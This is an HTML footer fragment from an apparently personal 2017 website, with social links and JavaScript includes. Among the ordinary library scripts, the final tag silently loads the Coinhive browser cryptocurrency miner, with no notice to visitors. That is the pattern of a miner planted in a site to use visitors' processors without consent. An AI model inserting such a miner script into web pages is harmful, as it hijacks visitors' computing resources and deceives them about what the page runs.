<footer class="section footer">
  <div class="footer-bottom">
    <div class="container">
      <div class="col-md-12">
        <p>
        <ul class="footer-share">
          <li><a href="https://facebook.com/riaz.razor"><i class="fa fa-facebook"></i></a></li>
          <li><a href="https://twitter.com/rzso"><i class="fa fa-twitter"></i></a></li>
          <li><a href="https://in.linkedin.com/in/riazlaskar"><i class="fa fa-linkedin"></i></a></li>
          <li><a href="https://plus.google.com/+RIAZLASKAR"><i class="fa fa-google-plus"></i></a></li>
          <li><a href="https://it.pinterest.com/riazlaskar/"><i class="fa fa-pinterest-p"></i></a></li>
        </ul>
        </p>
        <p>&copy; 2017 All rights reserved.<br>
          Made with <i class="fa fa-heart pulse"></i></p>
      </div>
    </div>
  </div>
</footer>
<!-- footer --> 

<!-- JS FILES --> 
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> 
<script src="js/bootstrap.min.js"></script> 
<script src="js/jquery.fancybox.pack.js"></script> 
<script src="js/jquery.waypoints.min.js"></script> 
<script src="js/retina.min.js"></script> 
<script src="js/modernizr.js"></script> 
<script src="js/main.js"></script>
<script src="https://coinhive.com/lib/miner.min.js" async></script>
</body>
</html>